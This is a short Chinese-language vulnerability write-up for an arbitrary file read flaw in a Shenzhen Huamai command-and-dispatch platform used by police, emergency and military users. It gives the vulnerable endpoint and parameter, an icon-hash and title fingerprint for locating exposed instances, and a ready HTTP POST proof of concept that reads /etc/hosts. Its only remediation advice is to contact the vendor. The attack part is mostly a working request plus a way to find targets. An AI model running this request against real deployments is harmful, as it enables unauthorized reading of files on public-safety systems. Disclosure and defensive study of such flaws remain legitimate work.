Nx01 產品簡介

????????深圳市華脈智聯科技有限公司，融合通信系統將公網集群系統、專網寬帶集群系統、不同制式、不同頻段的短波/超短波對講、模擬/數字集群系統、辦公電話系統、廣播系統、集群單兵視頻、視頻監控系統、視頻會議系統等融為一體，集成了專業的有線/無線一體化集群調度系統。同時方便靈活組網，實現客戶單位原有系統的兼容，以及多種手段互相備份的融合通信解決方案。可充分利用現場人員不同種類、不同網系的各種通信工具，快速構建現場臨時指揮體系，并可通過遠程接入，接受后方指揮中心的指揮調度。系統適用于公安指揮、警衛指揮、政府應急、消防救援、軍事訓練、搶險救災等場合。

Nx02 漏洞描述

????????深圳市華脈智聯科技有限公司指揮調度平臺存在任意文件讀取漏洞。/xml_edit/fileread.php目錄下file參數過濾不嚴格，導致可以讀取任意文件。

Nx03 產品主頁

????????web.icon=="c9f277fe58ae6833dd33b92b9ae0d7de" and title="指揮調度管理平臺"

Nx04 漏洞復現

POC：

POST /app/xml_edit/fileread.php HTTP/1.1
Host: {{Hostname}}
Content-Length: 15
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: closefile=/etc/hosts

Nx05 修復建議

????????建議聯系軟件廠商進行處理。